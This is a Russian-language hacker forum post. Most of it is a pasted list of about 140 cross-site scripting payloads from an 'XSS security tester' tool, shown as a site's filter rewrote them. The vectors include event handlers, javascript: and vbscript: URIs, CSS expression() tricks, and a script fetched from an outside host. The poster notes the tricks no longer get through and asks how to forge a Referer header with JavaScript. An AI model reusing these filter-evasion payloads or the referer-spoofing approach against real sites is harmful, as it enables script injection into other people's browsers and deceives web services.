ну ты сам хоть знаешь альтернативу?
а little lamer молодец набрал много вариантов тока зачем там програмка если и так все это можно послать?
и вот что получается:
<font face="Verdana" size=3 color=maroon>XSS</font><font face="Verdana" size=2 color=green> security tester v1.1</font><br>
<xscript><!-- alert(1) --></xscript>
<xscript src=http://xsstest.narod.ru/2.js><!-- --></xscript>
<xbody filtered-onLoad=alert(2)>
<xbody filtered-onlOaD=alert(3)>
<image src=http://xsstest.narod.ru/1.jpg filtered-onload=alert(5)>
<image src=http://xsstest.narod.ru/1.jpg filtered-onlOaD=alert(6)>
<image src=xjavascript
:alert(7)>
<image src="" filtered-onerror=alert(8)>
<image src='' filtered-onerror=alert(9)>
<img src="" filtered-onerror=alert(10)>
<img src='' filtered-onerror=alert(11)>
<xembed src=xjavascript
:alert(12);this.avi>
<xembed src=xjavascript
:alert(13);this.wav>
<img src=http://jstest.narod.ru/1.jpg filtered-onload=alert(14)>
<img src=http://jstest.narod.ru/1.jpg filtered-onlOaD=alert(15)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript
:alert(17))>
<span xstyle=background:url(xjavascript
:alert(18))></span>
<hr xstyle=top:expression(alert(19))>
<span xstyle=top:expression(alert(20))></span>
<span sss="alert(21);this.sss=null" xstyle=top:expression(eval(this.sss));></span>
<span sss='alert(22);this.sss=null' xstyle=top:expression(eval(this.sss));></span>
<span sss=alert(23);this.sss=null xstyle=top:expression(eval(this.sss));></span>
<hr sss="alert(24);this.sss=null" xstyle=top:expression(eval(this.sss));>
<hr sss='alert(25);this.sss=null' xstyle=top:expression(eval(this.sss));>
<hr sss=alert(26);this.sss=null xstyle=top:expression(eval(this.sss));>
<xstyle type="text/css"><!-- @import url(javascript
:alert(27)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript
:alert(28)></xobject>
<xiframe src=xjavascript
:alert(29)>
<a href=xjavascript
:alert(30) target="_blank">click me</a>
<image src=xvbscript
:alert(32)>
<xembed src=xvbscript
:alert(33);this.avi>
<xembed src=xvbscript
:alert(34);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xvbscript
:alert(36))>
<span xstyle=background:url(xvbscript
:alert(37))></span>
<xstyle type="text/css"><!-- @import url(vbscript
:alert(38)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xvbscript
:alert(39)></xobject>
<xiframe src=xvbscript
:alert(40)>
<a href=xvbscript
:alert(41) target="_blank">click me</a>
<image src=xjavascript
:alert(43)>
<xembed src=xjavascript
:alert(44);this.avi>
<xembed src=xjavascript
:alert(45);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript
:alert(47))>
<span xstyle=background:url(xjavascript
:alert(48))></span>
<xstyle type="text/css"><!-- @import url(javascript:alert(49)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript
:alert(50)></xobject>
<xiframe src=xjavascript
:alert(51)>
<a href=xjavascript
:alert(52) target="_blank">click me</a>
<image src=xjavascript
:alert(54)>
<xembed src=xjavascript
:alert(55);this.avi>
<xembed src=xjavascript
:alert(56);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript
:alert(58))>
<span xstyle=background:url(xjavascript
:alert(59))></span>
<xstyle type="text/css"><!-- @import url(javascript	:alert(60)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript
:alert(61)></xobject>
<xiframe src=xjavascript
:alert(62)>
<a href=xjavascript
:alert(63) target="_blank">click me</a>
<image src=xjavascript
:alert(65)>
<xembed src=xjavascript
:alert(66);this.avi>
<xembed src=xjavascript
:alert(67);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript
:alert(69))>
<span xstyle=background:url(xjavascript
:alert(70))></span>
<xstyle type="text/css"><!-- @import url(javascript
:alert(71)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript
:alert(72)></xobject>
<xiframe src=xjavascript
:alert(73)>
<a href=xjavascript
:alert(74) target="_blank">click me</a>
<image src=xjavascript
:alert(76)>
<xembed src=xjavascript
:alert(77);this.avi>
<xembed src=xjavascript
:alert(78);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript
:alert(80))>
<span xstyle=background:url(xjavascript
:alert(81))></span>
<xstyle type="text/css"><!-- @import url(javascript
:alert(82)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript
:alert(83)></xobject>
<xiframe src=xjavascript
:alert(84)>
<a href=xjavascript
:alert(85) target="_blank">click me</a>
<image src=xjavascript
:alert(87)>
<xembed src=xjavascript
:alert(88);this.avi>
<xembed src=xjavascript
:alert(89);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript
:alert(91))>
<span xstyle=background:url(xjavascript
:alert(92))></span>
<xstyle type="text/css"><!-- @import url(javascript :alert(93)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript
:alert(94)></xobject>
<xiframe src=xjavascript
:alert(95)>
<a href=xjavascript
:alert(96) target="_blank">click me</a>
<image src=xjavascript
:alert(98)>
<xembed src=xjavascript
:alert(99);this.avi>
<xembed src=xjavascript
:alert(100);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript
:alert(102))>
<span xstyle=background:url(xjavascript
:alert(103))></span>
<xstyle type="text/css"><!-- @import url(javascript
:alert(104)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=xjavascript
:alert(105)></xobject>
<xiframe src=javascript <a href=xjavascript
:alert(106)>click me</a>
<image src="" filtered-onERror=alert(107)>
<image src='' filtered-onERror=alert(108)>
<img src="" filtered-onERror=alert(109)>
<img src='' filtered-onERror=alert(110)>
<image src=""filtered-onerror=alert(111)>
<image src=''filtered-onerror=alert(112)>
<img src=""filtered-onerror=alert(113)>
<img src=''filtered-onerror=alert(114)>
<image src=""filtered-onErRor=alert(115)>
<image src=''filtered-onErRor=alert(116)>
<img src=""filtered-onErRor=alert(117)>
<img src=''filtered-onErRor=alert(118)>
<image src="a"filtered-onError=alert(119)>
<image src='a'filtered-onError=alert(120)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(121)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(122)>
<image src="a"filtered-onErRor=alert(123)>
<image src='a'filtered-onERror=alert(124)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(125)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(126)>
<image src="a" filtered-onErRor=alert(127)>
<image src='a' filtered-onErRor=alert(128)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(129)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(130)>
<image src="a"filtered-onerror=alert(131)>
<image src='a'filtered-onerror=alert(132)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(133)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(134)>
<image src="a"filtered-onErRor=alert(135)>
<image src='a'filtered-onErRor=alert(136)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(137)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(138)>
так что эти приколы уже непойдут.
да и ты знаешь можно ли как нибудь технично яваскриптом вставить левый реферер? я нет и приходится делать это через цги. скажи если знаешь.